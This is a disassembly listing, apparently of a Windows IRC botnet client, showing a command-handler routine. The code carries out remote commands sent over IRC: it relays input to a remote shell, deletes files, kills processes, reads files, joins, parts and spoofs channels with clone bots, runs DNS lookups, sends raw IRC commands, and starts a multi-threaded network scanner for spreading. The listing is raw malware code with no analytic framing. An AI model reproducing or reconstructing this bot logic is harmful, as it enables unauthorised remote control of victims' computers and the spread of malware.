mov dword_43434C[ecx], eax
jnz short loc_40A666
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aUpdateFailedTo ; "[UPDATE]: Failed to start download thre"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_40A685
; ---------------------------------------------------------------------------
loc_40A65E: ; CODE XREF: sub_4078FA+2D72�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40A666: ; CODE XREF: sub_4078FA+2D45�j
cmp [ebp+var_C08], esi
jz short loc_40A65E
jmp short loc_40A685
; ---------------------------------------------------------------------------
loc_40A670: ; CODE XREF: sub_4078FA+2C08�j
lea eax, [ebp+var_2E0]
push offset aUpdateUpToDate ; "[UPDATE]: Up to Date"
push eax
call sub_412BB5
pop ecx
pop ecx
xor esi, esi
loc_40A685: ; CODE XREF: sub_4078FA+2D62�j
; sub_4078FA+2D74�j
cmp [ebp+var_C], esi
jnz loc_409015
push esi
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push edi
jmp loc_40900D
; ---------------------------------------------------------------------------
loc_40A6A5: ; CODE XREF: sub_4078FA+212B�j
; sub_4078FA+213F�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jz loc_407B7B
cmp [ebp+var_14], eax
jz loc_407B7B
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
push eax
push [ebp+var_9C]
lea eax, [ebp+var_2E0]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+var_2E0]
push eax
push [ebp+arg_0]
call sub_412C40
push [ebp+var_8]
call sub_412F42
add esp, 30h
test eax, eax
jle short loc_40A72E
push [ebp+var_8]
call sub_412F42
imul eax, 3E8h
pop ecx
push eax
call ds:dword_41F000 ; Sleep
loc_40A72E: ; CODE XREF: sub_4078FA+2E1C�j
push offset aMainDelay_ ; "[MAIN]: Delay."
call sub_401C33
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40A742: ; CODE XREF: sub_4078FA+2103�j
; sub_4078FA+2117�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jz loc_407B7B
cmp [ebp+var_14], eax
jz loc_40CFE2
mov esi, [ebp+var_10]
push esi
push [ebp+var_14]
call sub_413920
pop ecx
pop ecx
mov ebx, eax
push 7
inc esi
pop ecx
xor eax, eax
mov edi, offset aRepeat ; "repeat"
repe cmpsb
lea eax, [ebp+var_2E0]
push ebx
jz short loc_40A7FC
push [ebp+var_9C]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+var_2E0]
push eax
push [ebp+arg_0]
call sub_412C40
push ebx
lea eax, [ebp+var_2E0]
push offset aMainRepeatS ; "[MAIN]: Repeat: %s"
push eax
call sub_412BB5
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
push [ebp+var_8]
call sub_412F42
add esp, 38h
test eax, eax
jle loc_40CFE2
push [ebp+var_8]
call sub_412F42
add eax, [ebp+arg_24]
pop ecx
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40A7FC: ; CODE XREF: sub_4078FA+2E8D�j
push offset aMainRepeatNotA ; "[MAIN]: Repeat not allowed in command l"...
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40A806: ; CODE XREF: sub_4078FA+20DB�j
; sub_4078FA+20EF�j
push [ebp+var_10]
lea eax, [ebp+var_2E0]
push offset aPartS_0 ; "PART %s"
push eax
call sub_412BB5
push [ebp+var_8]
call sub_412F42
add esp, 10h
loc_40A825: ; CODE XREF: sub_4078FA+2F98�j
test eax, eax
jle loc_40CFE2
push [ebp+var_8]
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
loc_40A841: ; CODE XREF: sub_4078FA+37D1�j
lea eax, [ebp+var_2E0]
push eax
push offset aS_4 ; "%s\r\n"
push [ebp+var_8]
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
jmp loc_40C133
; ---------------------------------------------------------------------------
loc_40A86C: ; CODE XREF: sub_4078FA+20B3�j
; sub_4078FA+20C7�j
push [ebp+ebx+var_98]
lea eax, [ebp+var_2E0]
push [ebp+var_10]
push offset aJoinSS ; "JOIN %s %s"
push eax
call sub_412BB5
push [ebp+var_8]
call sub_412F42
add esp, 14h
jmp short loc_40A825
; ---------------------------------------------------------------------------
loc_40A894: ; CODE XREF: sub_4078FA+208B�j
; sub_4078FA+209F�j
push [ebp+var_10]
loc_40A897: ; DATA XREF: .data:0042BD1C�o
; .data:0042BD60�o ...
lea eax, [ebp+var_2E0]
push offset aNickS ; "NICK %s"
push eax
call sub_412BB5
mov esi, [ebp+var_8]
push esi
call sub_412F42
add esp, 10h
test eax, eax
jle loc_40CFE2
push esi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
lea eax, [ebp+var_2E0]
push eax
push offset aS_4 ; "%s\r\n"
push esi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
push [ebp+var_10]
push esi
push offset aCloneNickSS ; "[CLONE]: Nick (%s): %s"
loc_40A8FB: ; CODE XREF: sub_4078FA+308C�j
; sub_4078FA+30FB�j ...
call sub_401CA7
jmp loc_40BDF5
; ---------------------------------------------------------------------------
loc_40A905: ; CODE XREF: sub_4078FA+2063�j
; sub_4078FA+2077�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40A937
push esi
lea eax, [ebp+var_2E0]
push offset aModeS ; "MODE %s"
push eax
call sub_412BB5
add esp, 0Ch
loc_40A937: ; CODE XREF: sub_4078FA+3026�j
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
lea eax, [ebp+var_2E0]
push eax
push offset aS_4 ; "%s\r\n"
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
push esi
push edi
push offset aCloneModeSS ; "[CLONE]: Mode (%s): %s"
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40A98B: ; CODE XREF: sub_4078FA+203B�j
; sub_4078FA+204F�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
push esi
push offset aS_4 ; "%s\r\n"
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
push esi
push edi
push offset aCloneRawSS ; "[CLONE]: Raw (%s): %s"
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40A9FA: ; CODE XREF: sub_4078FA+2013�j
; sub_4078FA+2027�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_404592
push esi
push offset aMainModeChange ; "[MAIN]: Mode change: %s"
jmp loc_40B2C5
; ---------------------------------------------------------------------------
loc_40AA34: ; CODE XREF: sub_4078FA+1FEB�j
; sub_4078FA+1FFF�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jz loc_407B7B
push [ebp+var_10]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
call sub_412F42
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_41F000 ; Sleep
push [ebp+ebx+var_98]
push [ebp+var_10]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_404592
push offset aMainCycle_ ; "[MAIN]: Cycle."
call sub_401C33
jmp loc_40B2CA
; ---------------------------------------------------------------------------
loc_40AA9A: ; CODE XREF: sub_4078FA+1FC3�j
; sub_4078FA+1FD7�j
cmp [ebp+var_14], 0
jz loc_40CFE2
lea edx, [eax+1]
loc_40AAA7: ; CODE XREF: sub_4078FA+31B2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AAA7
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40AAB8: ; CODE XREF: sub_4078FA+31C3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AAB8
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push esi
lea eax, [ebp+var_2E0]
push offset dword_425A58
push eax
call sub_412BB5
push 0
push 0
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_8]
push [ebp+arg_4]
call sub_4045DD
push esi
push [ebp+var_8]
push offset aMainActionSS_ ; "[MAIN]: Action: %s: %s."
call sub_401CA7
add esp, 2Ch
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40AB1D: ; CODE XREF: sub_4078FA+1F9B�j
; sub_4078FA+1FAF�j
cmp [ebp+var_14], 0
jz loc_40CFE2
lea edx, [eax+1]
loc_40AB2A: ; CODE XREF: sub_4078FA+3235�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AB2A
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40AB3B: ; CODE XREF: sub_4078FA+3246�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AB3B
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push 0
push 0
push esi
push [ebp+var_8]
push [ebp+arg_4]
call sub_4045DD
push esi
push [ebp+var_8]
push offset aMainPrivmsgSS_ ; "[MAIN]: Privmsg: %s: %s."
call sub_401CA7
loc_40AB80: ; CODE XREF: sub_4078FA+52BC�j
add esp, 20h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40AB88: ; CODE XREF: sub_4078FA+1F73�j
; sub_4078FA+1F87�j
cmp [ebp+var_14], 0
jz loc_407B7B
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_407B7B
push eax
push [ebp+var_8]
call sub_401B23
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainAliasAdded ; "[MAIN]: Alias added: %s."
push eax
call sub_412BB5
add esp, 14h
loc_40ABC7: ; CODE XREF: sub_4078FA+38BC�j
; sub_4078FA+4C47�j
cmp [ebp+var_C], 0
jnz short loc_40ABEA
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40ABEA: ; CODE XREF: sub_4078FA+32D1�j
; sub_4078FA+4405�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
jmp loc_40D1A1
; ---------------------------------------------------------------------------
loc_40ABFB: ; CODE XREF: sub_4078FA+1E33�j
; sub_4078FA+1E47�j
push [ebp+var_8]
push [ebp+arg_1C]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_40CFE2
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
jz short loc_40AC96
push ebx
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
lea eax, [ebp+var_2E0]
jz short loc_40AC84
push esi
push [ebp+var_9C]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+var_2E0]
push eax
push [ebp+arg_0]
call sub_412C40
push esi
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainGethostSCo ; "[MAIN]: Gethost: %s, Command: %s"
push eax
call sub_412BB5
add esp, 34h
inc [ebp+arg_24]
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40AC84: ; CODE XREF: sub_4078FA+3336�j
push offset aMainUnableToEx ; "[MAIN]: Unable to extract Gethost comma"...
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40AC96: ; CODE XREF: sub_4078FA+331F�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_410086
add esp, 0Ch
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainGethostS_ ; "[MAIN]: Gethost: %s."
push 200h
push eax
call sub_412E0D
add esp, 24h
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40ACE0: ; CODE XREF: sub_4078FA+1B62�j
; sub_4078FA+1B76�j
push offset aR ; "r"
push [ebp+var_8]
call sub_413393
mov edi, eax
test edi, edi
pop ecx
pop ecx
lea eax, [ebp+var_2E0]
jz short loc_40AD5E
push edi
mov esi, 200h
push esi
push eax
call sub_4142F5
add esp, 0Ch
jmp short loc_40AD38
; ---------------------------------------------------------------------------
loc_40AD0D: ; CODE XREF: sub_4078FA+3440�j
push 1
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push edi
lea eax, [ebp+var_2E0]
push esi
push eax
call sub_4142F5
add esp, 20h
loc_40AD38: ; CODE XREF: sub_4078FA+3411�j
test eax, eax
jnz short loc_40AD0D
push edi
call sub_412F93
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainReadFileCo ; "[MAIN]: Read file complete: %s"
push eax
call sub_412BB5
add esp, 10h
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40AD5E: ; CODE XREF: sub_4078FA+33FF�j
push [ebp+var_8]
push offset aMainReadFileFa ; "[MAIN]: Read file failed: %s"
loc_40AD66: ; CODE XREF: sub_4078FA+2F07�j
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_40AD74: ; CODE XREF: sub_4078FA+1B3A�j
; sub_4078FA+1B4E�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_40CFE2
mov edi, ebx
dec edi
loc_40AD98: ; CODE XREF: sub_4078FA+34A4�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40AD98
mov esi, offset asc_420328 ; "\n"
push ebx
movsw
call sub_40DB6D
test eax, eax
pop ecx
lea eax, [ebp+var_2E0]
jnz short loc_40ADBF
push offset aCmdErrorSendin ; "[CMD]: Error sending to remote shell."
jmp short loc_40AE0C
; ---------------------------------------------------------------------------
loc_40ADBF: ; CODE XREF: sub_4078FA+34BC�j
push ebx
push offset aCmdCommandsS ; "[CMD]: Commands: %s"
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_40AE37
; ---------------------------------------------------------------------------
loc_40ADD0: ; CODE XREF: sub_4078FA+1B12�j
; sub_4078FA+1B26�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_40CFE2
push eax
call sub_4057CD
test eax, eax
pop ecx
lea eax, [ebp+var_2E0]
jnz short loc_40AE07
push offset aMircClientNotO ; "[mIRC]: Client not open."
jmp short loc_40AE0C
; ---------------------------------------------------------------------------
loc_40AE07: ; CODE XREF: sub_4078FA+3504�j
push offset aMircCommandSen ; "[mIRC]: Command sent."
loc_40AE0C: ; CODE XREF: sub_4078FA+1C34�j
; sub_4078FA+1C3E�j ...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40AE14: ; CODE XREF: sub_4078FA+1BAF�j
; sub_4078FA+1C0C�j ...
cmp [ebp+var_C], 0
jnz short loc_40AE37
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40AE37: ; CODE XREF: sub_4078FA+3385�j
; sub_4078FA+3397�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40AE49: ; CODE XREF: sub_4078FA+1AEA�j
; sub_4078FA+1AFE�j
push 0
push [ebp+var_9C]
push [ebp+arg_4]
push [ebp+var_8]
call sub_4030C4
push [ebp+var_8]
push offset aFileListS ; "[FILE]: List: %s"
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40AE69: ; CODE XREF: sub_4078FA+1AC2�j
; sub_4078FA+1AD6�j
push 20h
push [ebp+var_8]
call ds:dword_41F0A0 ; SetFileAttributesA
push [ebp+var_8]
call ds:dword_41F0B8 ; DeleteFileA
test eax, eax
jz short loc_40AE8B
push [ebp+var_8]
push offset aFileDeletedS_0 ; "[FILE]: Deleted '%s'."
jmp short loc_40AE96
; ---------------------------------------------------------------------------
loc_40AE8B: ; CODE XREF: sub_4078FA+3585�j
push offset aFile ; "[FILE]:"
call sub_405708
push eax
loc_40AE96: ; CODE XREF: sub_4078FA+358F�j
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
loc_40AEA7: ; CODE XREF: sub_4078FA+36F0�j
add esp, 10h
loc_40AEAA: ; CODE XREF: sub_4078FA+3708�j
; sub_4078FA+4ABC�j
cmp [ebp+var_C], 0
jnz loc_409015
push 0
jmp loc_408FFA
; ---------------------------------------------------------------------------
loc_40AEBB: ; CODE XREF: sub_4078FA+1A9A�j
; sub_4078FA+1AAE�j
push [ebp+var_8]
call sub_412F42
push eax
call sub_4074C6
xor esi, esi
pop ecx
inc esi
pop ecx
push [ebp+var_8]
cmp eax, esi
lea eax, [ebp+var_2E0]
jnz short loc_40AEE2
push offset aProcProcessKil ; "[PROC]: Process killed ID: %s"
jmp short loc_40AEE7
; ---------------------------------------------------------------------------
loc_40AEE2: ; CODE XREF: sub_4078FA+35DF�j
push offset aProcFailedToTe ; "[PROC]: Failed to terminate process ID:"...
loc_40AEE7: ; CODE XREF: sub_4078FA+35E6�j
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], 0
jnz loc_409018
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
jmp loc_409018
; ---------------------------------------------------------------------------
loc_40AF1C: ; CODE XREF: sub_4078FA+1A72�j
; sub_4078FA+1A86�j
push 1
xor esi, esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4070E8
add esp, 1Ch
cmp eax, 1
jnz short loc_40AF55
push [ebp+var_8]
push offset aProcProcessK_0 ; "[PROC]: Process killed & deleted: %s"
loc_40AF46: ; CODE XREF: sub_4078FA+299B�j
lea eax, [ebp+var_2E0]
loc_40AF4C: ; CODE XREF: sub_4078FA+2BCF�j
; sub_4078FA+3694�j ...
push eax
call sub_412BB5
add esp, 0Ch
loc_40AF55: ; CODE XREF: sub_4078FA+29B0�j
; sub_4078FA+2B73�j ...
cmp [ebp+var_C], esi
jnz loc_409015
push esi
jmp loc_408FFA
; ---------------------------------------------------------------------------
loc_40AF64: ; CODE XREF: sub_4078FA+1A4A�j
; sub_4078FA+1A5E�j
xor esi, esi
push esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push esi
push [ebp+arg_4]
call sub_4070E8
add esp, 1Ch
push [ebp+var_8]
cmp eax, 1
lea eax, [ebp+var_2E0]
jnz short loc_40AF90
push offset aProcProcessK_1 ; "[PROC]: Process killed: %s"
jmp short loc_40AF4C
; ---------------------------------------------------------------------------
loc_40AF90: ; CODE XREF: sub_4078FA+368D�j
push offset aProcFailedTo_0 ; "[PROC]: Failed to terminate process: %s"...
jmp short loc_40AF4C
; ---------------------------------------------------------------------------
loc_40AF97: ; CODE XREF: sub_4078FA+1A22�j
; sub_4078FA+1A36�j
mov esi, [ebp+var_8]
push esi
call dword_433514
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40AFBF
push 2
push 4
lea eax, [ebp+arg_0]
push eax
call dword_433590
test eax, eax
jz short loc_40AFEF
push dword ptr [eax]
jmp short loc_40AFD8
; ---------------------------------------------------------------------------
loc_40AFBF: ; CODE XREF: sub_4078FA+36AD�j
push esi
call dword_433500
test eax, eax
jz short loc_40AFEF
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_433520
push eax
loc_40AFD8: ; CODE XREF: sub_4078FA+36C3�j
push esi
lea eax, [ebp+var_2E0]
push offset aDnsLookupSS_ ; "[DNS]: Lookup: %s -> %s."
push eax
call sub_412BB5
jmp loc_40AEA7
; ---------------------------------------------------------------------------
loc_40AFEF: ; CODE XREF: sub_4078FA+36BF�j
; sub_4078FA+36CE�j
lea eax, [ebp+var_2E0]
push offset aDnsCouldnTReso ; "[DNS]: Couldn't resolve hostname."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40AEAA
; ---------------------------------------------------------------------------
loc_40B007: ; CODE XREF: sub_4078FA+19FA�j
; sub_4078FA+1A0E�j
push 7Fh
push [ebp+var_8]
push [ebp+arg_14]
call sub_412C40
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainServerChan ; "[MAIN]: Server changed to: '%s'."
push eax
call sub_412BB5
add esp, 18h
jmp loc_40C47E
; ---------------------------------------------------------------------------
loc_40B030: ; CODE XREF: sub_4078FA+19D2�j
; sub_4078FA+19E6�j
push 5
xor esi, esi
push esi
push esi
push [ebp+var_8]
push offset aOpen ; "open"
push esi
call dword_4335A8
push [ebp+var_8]
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_40B05C
push offset aShellFileOpene ; "[SHELL]: File opened: %s"
jmp loc_40AF4C
; ---------------------------------------------------------------------------
loc_40B05C: ; CODE XREF: sub_4078FA+3756�j
push offset aShellCouldnTOp ; "[SHELL]: Couldn't open file: %s"
jmp loc_40AF4C
; ---------------------------------------------------------------------------
loc_40B066: ; CODE XREF: sub_4078FA+19AA�j
; sub_4078FA+19BE�j
mov eax, [ebp+var_8]
mov cl, [eax]
mov byte_42AE5C, cl
movsx eax, byte ptr [eax]
push eax
push offset aMainPrefixChan ; "[MAIN]: Prefix changed to: '%c'."
jmp loc_40C46F
; ---------------------------------------------------------------------------
loc_40B07F: ; CODE XREF: sub_4078FA+1982�j
; sub_4078FA+1996�j
push [ebp+var_8]
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push [ebp+var_8]
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
push 0
push 0
lea eax, [ebp+var_B8]
push 2
push eax
call sub_40E7B0
push eax
lea eax, [ebp+var_2E0]
push offset aNickS ; "NICK %s"
push eax
call sub_412BB5
add esp, 1Ch
jmp loc_40A841
; ---------------------------------------------------------------------------
loc_40B0D0: ; CODE XREF: sub_4078FA+195A�j
; sub_4078FA+196E�j
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_407B7B
push edi
call sub_412F42
mov esi, 1F4h
cmp eax, esi
pop ecx
jge loc_407B7B
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
pop ecx
pop ecx
push esi
call ds:dword_41F000 ; Sleep
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call dword_4335AC
push [ebp+var_18]
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_43434C[eax]
call ds:dword_41F0C8 ; TerminateThread
push edi
call sub_412F42
imul eax, 234h
and dword_43434C[eax], 0
push edi
call sub_412F42
imul eax, 234h
and byte ptr dword_434138[eax], 0
pop ecx
pop ecx
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40B17E: ; CODE XREF: sub_4078FA+1932�j
; sub_4078FA+1946�j
mov edi, [ebp+var_8]
push 4
mov esi, offset aAll ; "all"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B1BB
call sub_41105B
test eax, eax
jle short loc_40B1A3
push eax
push offset aThreadsStopped ; "[THREADS]: Stopped: %d thread(s)."
jmp loc_40C532
; ---------------------------------------------------------------------------
loc_40B1A3: ; CODE XREF: sub_4078FA+389C�j
push offset aThreadsNoActiv ; "[THREADS]: No active threads found."
loc_40B1A8: ; CODE XREF: sub_4078FA+420E�j
; sub_4078FA+422D�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40ABC7
; ---------------------------------------------------------------------------
loc_40B1BB: ; CODE XREF: sub_4078FA+3893�j
mov edi, [ebp+var_1C]
jmp short loc_40B22D
; ---------------------------------------------------------------------------
loc_40B1C0: ; CODE XREF: sub_4078FA+3937�j
mov esi, [ebp+edi*4+var_A4]
test esi, esi
jz loc_407B7B
push esi
call sub_412F42
push eax
call sub_410FD3
pop ecx
pop ecx
test eax, eax
push esi
lea eax, [ebp+var_2E0]
jz short loc_40B1EF
push offset aThreadsKilledT ; "[THREADS]: Killed thread: %s."
jmp short loc_40B1F4
; ---------------------------------------------------------------------------
loc_40B1EF: ; CODE XREF: sub_4078FA+38EC�j
push offset aThreadsFailedT ; "[THREADS]: Failed to kill thread: %s."
loc_40B1F4: ; CODE XREF: sub_4078FA+38F3�j
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40B220
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40B220: ; CODE XREF: sub_4078FA+3907�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
loc_40B22D: ; CODE XREF: sub_4078FA+38C4�j
inc edi
cmp edi, 20h
jb short loc_40B1C0
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40B238: ; CODE XREF: sub_4078FA+190A�j
; sub_4078FA+191E�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push esi
push offset aS_4 ; "%s\r\n"
push [ebp+arg_4]
call sub_404592
push esi
push offset aMainIrcRawS_ ; "[MAIN]: IRC Raw: %s."
jmp short loc_40B2C5
; ---------------------------------------------------------------------------
loc_40B26F: ; CODE XREF: sub_4078FA+18E2�j
; sub_4078FA+18F6�j
push [ebp+var_8]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
push offset aMainPartedChan ; "[MAIN]: Parted channel: '%s'."
jmp short loc_40B2C5
; ---------------------------------------------------------------------------
loc_40B289: ; CODE XREF: sub_4078FA+18BA�j
; sub_4078FA+18CE�j
push [ebp+ebx+var_9C]
push [ebp+var_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
push offset aMainJoinedCh_0 ; "[MAIN]: Joined channel: '%s'."
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40B2AD: ; CODE XREF: sub_4078FA+1892�j
; sub_4078FA+18A6�j
push [ebp+var_8]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
push offset aMainNickChange ; "[MAIN]: Nick changed to: '%s'."
loc_40B2C5: ; CODE XREF: sub_4078FA+3135�j
; sub_4078FA+3973�j ...
call sub_401CA7
loc_40B2CA: ; CODE XREF: sub_4078FA+319B�j
add esp, 14h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40B2D2: ; CODE XREF: sub_4078FA+1858�j
; sub_4078FA+186C�j
mov cl, byte_42A1B2
and [ebp+arg_0], 0
test cl, cl
mov edx, offset byte_42A1B2
jz loc_407B7B
mov eax, edx
loc_40B2EB: ; CODE XREF: sub_4078FA+39FA�j
inc [ebp+arg_0]
add eax, 0Bh
cmp byte ptr [eax], 0
jnz short loc_40B2EB
test cl, cl
jz loc_407B7B
mov [ebp+var_1C], edx
loc_40B301: ; CODE XREF: sub_4078FA+3CDE�j
push 9
call sub_4110DA
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 258h
jle short loc_40B351
push ecx
lea eax, [ebp+var_2E0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 20h
jmp loc_40B5CE
; ---------------------------------------------------------------------------
loc_40B351: ; CODE XREF: sub_4078FA+3A21�j
or [ebp+var_4C8], 0FFFFFFFFh
xor esi, esi
cmp dword_42A068, esi
mov [ebp+var_4CC], 0C8h
mov [ebp+var_4E0], 5
mov [ebp+var_4DC], esi
mov [ebp+arg_0], esi
jz short loc_40B3E4
mov edx, [ebp+var_1C]
add edx, 0FFFFFFF6h
mov edi, offset dword_42A068
